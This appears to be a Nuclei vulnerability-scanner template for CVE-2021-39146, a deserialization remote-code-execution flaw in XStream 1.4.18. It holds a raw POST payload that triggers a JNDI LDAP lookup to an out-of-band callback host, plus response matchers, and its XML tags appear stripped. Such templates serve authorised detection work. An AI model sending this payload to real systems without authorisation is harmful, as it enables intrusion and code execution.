id: CVE-2021-39146 info: name: XStream 1.4.18 - Arbitrary Code Execution author: pwnhxl severity: high description: | XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted. reference: - https://x-stream.github.io/CVE-2021-39146.html - https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/CVE-2021-39146 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39146 cwe-id: CWE-502,CWE-434 epss-score: 0.12475 tags: cve,cve2021,xstream,deserialization,rce metadata: max-request: 1 http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml test 0.75 525 700 0 zh_CN 0.75 525 700 1 lazyValue javax.naming.InitialContext doLookup ldap://{{interactsh-url}}/#evil test test matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - "timestamp" - "com.thoughtworks.xstream" condition: or - type: word part: header words: - "application/json" - type: status status: - 500 # Enhanced by cs on 2023/04/17